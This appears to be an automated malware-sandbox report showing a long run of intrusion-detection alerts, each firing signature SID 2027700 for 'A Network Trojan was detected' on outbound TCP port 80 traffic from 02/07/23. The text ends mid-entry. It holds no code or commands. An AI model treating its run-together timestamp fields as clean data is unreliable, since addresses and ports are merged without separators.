                          Timestamp:192.168.2.662.204.41.449967802027700 02/07/23-20:01:59.487215
                          SID:2027700
                          Source Port:49967
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449909802027700 02/07/23-20:01:41.612708
                          SID:2027700
                          Source Port:49909
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450237802027700 02/07/23-20:03:16.563327
                          SID:2027700
                          Source Port:50237
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449860802027700 02/07/23-20:01:29.628066
                          SID:2027700
                          Source Port:49860
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450252802027700 02/07/23-20:03:20.248979
                          SID:2027700
                          Source Port:50252
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450415802027700 02/07/23-20:04:02.837203
                          SID:2027700
                          Source Port:50415
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449789802027700 02/07/23-20:01:10.000649
                          SID:2027700
                          Source Port:49789
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450160802027700 02/07/23-20:02:58.000084
                          SID:2027700
                          Source Port:50160
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450430802027700 02/07/23-20:04:06.494424
                          SID:2027700
                          Source Port:50430
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449832802027700 02/07/23-20:01:20.240759
                          SID:2027700
                          Source Port:49832
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450451802027700 02/07/23-20:04:11.626762
                          SID:2027700
                          Source Port:50451
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450013802027700 02/07/23-20:02:14.205368
                          SID:2027700
                          Source Port:50013
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450016802027700 02/07/23-20:02:14.953404
                          SID:2027700
                          Source Port:50016
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450365802027700 02/07/23-20:03:50.517630
                          SID:2027700
                          Source Port:50365
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450074802027700 02/07/23-20:02:32.940709
                          SID:2027700
                          Source Port:50074
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449924802027700 02/07/23-20:01:46.876099
                          SID:2027700
                          Source Port:49924
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449939802027700 02/07/23-20:01:52.546117
                          SID:2027700
                          Source Port:49939
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450273802027700 02/07/23-20:03:27.900257
                          SID:2027700
                          Source Port:50273
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450329802027700 02/07/23-20:03:41.705909
                          SID:2027700
                          Source Port:50329
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450059802027700 02/07/23-20:02:26.009359
                          SID:2027700
                          Source Port:50059
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449746802027700 02/07/23-20:00:57.646912
                          SID:2027700
                          Source Port:49746
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450224802027700 02/07/23-20:03:13.408043
                          SID:2027700
                          Source Port:50224
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449865802027700 02/07/23-20:01:30.873059
                          SID:2027700
                          Source Port:49865
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449824802027700 02/07/23-20:01:18.327900
                          SID:2027700
                          Source Port:49824
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450005802027700 02/07/23-20:02:12.152880
                          SID:2027700
                          Source Port:50005
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450187802027700 02/07/23-20:03:04.340649
                          SID:2027700
                          Source Port:50187
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449995802027700 02/07/23-20:02:09.662326
                          SID:2027700
                          Source Port:49995
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449784802027700 02/07/23-20:01:06.918802
                          SID:2027700
                          Source Port:49784
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450146802027700 02/07/23-20:02:54.625344
                          SID:2027700
                          Source Port:50146
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450265802027700 02/07/23-20:03:25.941004
                          SID:2027700
                          Source Port:50265
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450443802027700 02/07/23-20:04:09.644630
                          SID:2027700
                          Source Port:50443
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450402802027700 02/07/23-20:03:59.613926
                          SID:2027700
                          Source Port:50402
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449759802027700 02/07/23-20:01:00.829527
                          SID:2027700
                          Source Port:49759
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450087802027700 02/07/23-20:02:36.507624
                          SID:2027700
                          Source Port:50087
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450290802027700 02/07/23-20:03:32.058144
                          SID:2027700
                          Source Port:50290
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450378802027700 02/07/23-20:03:53.744252
                          SID:2027700
                          Source Port:50378
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449978802027700 02/07/23-20:02:01.964465
                          SID:2027700
                          Source Port:49978
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449890802027700 02/07/23-20:01:36.846820
                          SID:2027700
                          Source Port:49890
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450159802027700 02/07/23-20:02:57.764941
                          SID:2027700
                          Source Port:50159
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450118802027700 02/07/23-20:02:44.402579
                          SID:2027700
                          Source Port:50118
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450337802027700 02/07/23-20:03:43.661817
                          SID:2027700
                          Source Port:50337
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449937802027700 02/07/23-20:01:52.063127
                          SID:2027700
                          Source Port:49937
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450046802027700 02/07/23-20:02:22.274271
                          SID:2027700
                          Source Port:50046
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449718802027700 02/07/23-20:00:50.878461
                          SID:2027700
                          Source Port:49718
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450260802027700 02/07/23-20:03:22.605985
                          SID:2027700
                          Source Port:50260
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450306802027700 02/07/23-20:03:36.017602
                          SID:2027700
                          Source Port:50306
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450300802027700 02/07/23-20:03:34.563838
                          SID:2027700
                          Source Port:50300
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450211802027700 02/07/23-20:03:10.237661
                          SID:2027700
                          Source Port:50211
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450122802027700 02/07/23-20:02:45.389628
                          SID:2027700
                          Source Port:50122
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450474802027700 02/07/23-20:04:17.216226
                          SID:2027700
                          Source Port:50474
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449794802027700 02/07/23-20:01:11.263709
                          SID:2027700
                          Source Port:49794
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449766802027700 02/07/23-20:01:02.341785
                          SID:2027700
                          Source Port:49766
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449944802027700 02/07/23-20:01:53.792362
                          SID:2027700
                          Source Port:49944
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449855802027700 02/07/23-20:01:26.978024
                          SID:2027700
                          Source Port:49855
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449883802027700 02/07/23-20:01:35.109836
                          SID:2027700
                          Source Port:49883
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449962802027700 02/07/23-20:01:58.212789
                          SID:2027700
                          Source Port:49962
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450296802027700 02/07/23-20:03:33.595122
                          SID:2027700
                          Source Port:50296
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450033802027700 02/07/23-20:02:19.127549
                          SID:2027700
                          Source Port:50033
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449873802027700 02/07/23-20:01:32.847820
                          SID:2027700
                          Source Port:49873
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450385802027700 02/07/23-20:03:55.477920
                          SID:2027700
                          Source Port:50385
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450039802027700 02/07/23-20:02:20.584895
                          SID:2027700
                          Source Port:50039
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450128802027700 02/07/23-20:02:48.244683
                          SID:2027700
                          Source Port:50128
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450140802027700 02/07/23-20:02:53.167783
                          SID:2027700
                          Source Port:50140
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450217802027700 02/07/23-20:03:11.704054
                          SID:2027700
                          Source Port:50217
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450051802027700 02/07/23-20:02:23.494295
                          SID:2027700
                          Source Port:50051
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450095802027700 02/07/23-20:02:38.620537
                          SID:2027700
                          Source Port:50095
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449738802027700 02/07/23-20:00:55.702188
                          SID:2027700
                          Source Port:49738
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450184802027700 02/07/23-20:03:03.616190
                          SID:2027700
                          Source Port:50184
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450227802027700 02/07/23-20:03:14.108353
                          SID:2027700
                          Source Port:50227
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449804802027700 02/07/23-20:01:13.672357
                          SID:2027700
                          Source Port:49804
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450316802027700 02/07/23-20:03:38.501751
                          SID:2027700
                          Source Port:50316
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450357802027700 02/07/23-20:03:48.563249
                          SID:2027700
                          Source Port:50357
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450446802027700 02/07/23-20:04:10.384849
                          SID:2027700
                          Source Port:50446
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450405802027700 02/07/23-20:04:00.344097
                          SID:2027700
                          Source Port:50405
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449916802027700 02/07/23-20:01:43.294683
                          SID:2027700
                          Source Port:49916
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449934802027700 02/07/23-20:01:51.338963
                          SID:2027700
                          Source Port:49934
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449827802027700 02/07/23-20:01:19.034168
                          SID:2027700
                          Source Port:49827
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449756802027700 02/07/23-20:01:00.094396
                          SID:2027700
                          Source Port:49756
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449893802027700 02/07/23-20:01:37.604134
                          SID:2027700
                          Source Port:49893
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450156802027700 02/07/23-20:02:57.043867
                          SID:2027700
                          Source Port:50156
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450280802027700 02/07/23-20:03:29.633131
                          SID:2027700
                          Source Port:50280
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449845802027700 02/07/23-20:01:23.372817
                          SID:2027700
                          Source Port:49845
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450061802027700 02/07/23-20:02:27.765974
                          SID:2027700
                          Source Port:50061
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450150802027700 02/07/23-20:02:55.620345
                          SID:2027700
                          Source Port:50150
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449982802027700 02/07/23-20:02:02.953057
                          SID:2027700
                          Source Port:49982
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450268802027700 02/07/23-20:03:26.680608
                          SID:2027700
                          Source Port:50268
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450067802027700 02/07/23-20:02:31.198973
                          SID:2027700
                          Source Port:50067
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450197802027700 02/07/23-20:03:06.840701
                          SID:2027700
                          Source Port:50197
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450423802027700 02/07/23-20:04:04.774413
                          SID:2027700
                          Source Port:50423
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450179802027700 02/07/23-20:03:02.638946
                          SID:2027700
                          Source Port:50179
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450464802027700 02/07/23-20:04:14.739715
                          SID:2027700
                          Source Port:50464
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450138802027700 02/07/23-20:02:52.674592
                          SID:2027700
                          Source Port:50138
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450286802027700 02/07/23-20:03:31.095393
                          SID:2027700
                          Source Port:50286
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450049802027700 02/07/23-20:02:23.003141
                          SID:2027700
                          Source Port:50049
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450245802027700 02/07/23-20:03:18.483828
                          SID:2027700
                          Source Port:50245
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450334802027700 02/07/23-20:03:42.924733
                          SID:2027700
                          Source Port:50334
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450375802027700 02/07/23-20:03:53.005630
                          SID:2027700
                          Source Port:50375
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449817802027700 02/07/23-20:01:16.563418
                          SID:2027700
                          Source Port:49817
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450436802027700 02/07/23-20:04:07.968971
                          SID:2027700
                          Source Port:50436
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449906802027700 02/07/23-20:01:40.847690
                          SID:2027700
                          Source Port:49906
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449728802027700 02/07/23-20:00:53.301055
                          SID:2027700
                          Source Port:49728
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450344802027700 02/07/23-20:03:45.384589
                          SID:2027700
                          Source Port:50344
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450433802027700 02/07/23-20:04:07.254488
                          SID:2027700
                          Source Port:50433
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450191802027700 02/07/23-20:03:05.327791
                          SID:2027700
                          Source Port:50191
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449988802027700 02/07/23-20:02:04.410732
                          SID:2027700
                          Source Port:49988
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449903802027700 02/07/23-20:01:40.097751
                          SID:2027700
                          Source Port:49903
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449725802027700 02/07/23-20:00:52.567467
                          SID:2027700
                          Source Port:49725
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449896802027700 02/07/23-20:01:38.330966
                          SID:2027700
                          Source Port:49896
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449985802027700 02/07/23-20:02:03.672175
                          SID:2027700
                          Source Port:49985
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449814802027700 02/07/23-20:01:15.831910
                          SID:2027700
                          Source Port:49814
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450169802027700 02/07/23-20:03:00.200665
                          SID:2027700
                          Source Port:50169
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450166802027700 02/07/23-20:02:59.478159
                          SID:2027700
                          Source Port:50166
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449750802027700 02/07/23-20:00:58.621945
                          SID:2027700
                          Source Port:49750
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449899802027700 02/07/23-20:01:39.123661
                          SID:2027700
                          Source Port:49899
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450270802027700 02/07/23-20:03:27.172191
                          SID:2027700
                          Source Port:50270
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450255802027700 02/07/23-20:03:20.983533
                          SID:2027700
                          Source Port:50255
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450077802027700 02/07/23-20:02:33.659592
                          SID:2027700
                          Source Port:50077
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450010802027700 02/07/23-20:02:13.422325
                          SID:2027700
                          Source Port:50010
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450258802027700 02/07/23-20:03:21.947679
                          SID:2027700
                          Source Port:50258
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450347802027700 02/07/23-20:03:46.099227
                          SID:2027700
                          Source Port:50347
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450449802027700 02/07/23-20:04:11.130604
                          SID:2027700
                          Source Port:50449
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450420802027700 02/07/23-20:04:04.035367
                          SID:2027700
                          Source Port:50420
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449919802027700 02/07/23-20:01:44.090733
                          SID:2027700
                          Source Port:49919
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449931802027700 02/07/23-20:01:50.612148
                          SID:2027700
                          Source Port:49931
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449801802027700 02/07/23-20:01:12.934086
                          SID:2027700
                          Source Port:49801
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449842802027700 02/07/23-20:01:22.668685
                          SID:2027700
                          Source Port:49842
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450023802027700 02/07/23-20:02:16.679938
                          SID:2027700
                          Source Port:50023
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450372802027700 02/07/23-20:03:52.297867
                          SID:2027700
                          Source Port:50372
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449753802027700 02/07/23-20:00:59.355095
                          SID:2027700
                          Source Port:49753
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450153802027700 02/07/23-20:02:56.341247
                          SID:2027700
                          Source Port:50153
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450242802027700 02/07/23-20:03:17.764359
                          SID:2027700
                          Source Port:50242
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450461802027700 02/07/23-20:04:14.005420
                          SID:2027700
                          Source Port:50461
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450331802027700 02/07/23-20:03:42.173293
                          SID:2027700
                          Source Port:50331
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450194802027700 02/07/23-20:03:06.078733
                          SID:2027700
                          Source Port:50194
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450201802027700 02/07/23-20:03:07.797561
                          SID:2027700
                          Source Port:50201
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450408802027700 02/07/23-20:04:01.096954
                          SID:2027700
                          Source Port:50408
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450112802027700 02/07/23-20:02:42.895840
                          SID:2027700
                          Source Port:50112
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450283802027700 02/07/23-20:03:30.376799
                          SID:2027700
                          Source Port:50283
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450064802027700 02/07/23-20:02:30.633740
                          SID:2027700
                          Source Port:50064
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450319802027700 02/07/23-20:03:39.222800
                          SID:2027700
                          Source Port:50319
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449843802027700 02/07/23-20:01:22.907370
                          SID:2027700
                          Source Port:49843
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450110802027700 02/07/23-20:02:42.417578
                          SID:2027700
                          Source Port:50110
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450171802027700 02/07/23-20:03:00.685944
                          SID:2027700
                          Source Port:50171
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450364802027700 02/07/23-20:03:50.279050
                          SID:2027700
                          Source Port:50364
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450462802027700 02/07/23-20:04:14.252136
                          SID:2027700
                          Source Port:50462
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450012802027700 02/07/23-20:02:13.968224
                          SID:2027700
                          Source Port:50012
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450073802027700 02/07/23-20:02:32.709344
                          SID:2027700
                          Source Port:50073
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449999802027700 02/07/23-20:02:10.659483
                          SID:2027700
                          Source Port:49999
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450459802027700 02/07/23-20:04:13.538198
                          SID:2027700
                          Source Port:50459
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449745802027700 02/07/23-20:00:57.394746
                          SID:2027700
                          Source Port:49745
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.449941802027700 02/07/23-20:01:53.041040
                          SID:2027700
                          Source Port:49941
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.662.204.41.450401802027700 02/07/23-20:03:59.377764
                          SID:2027700
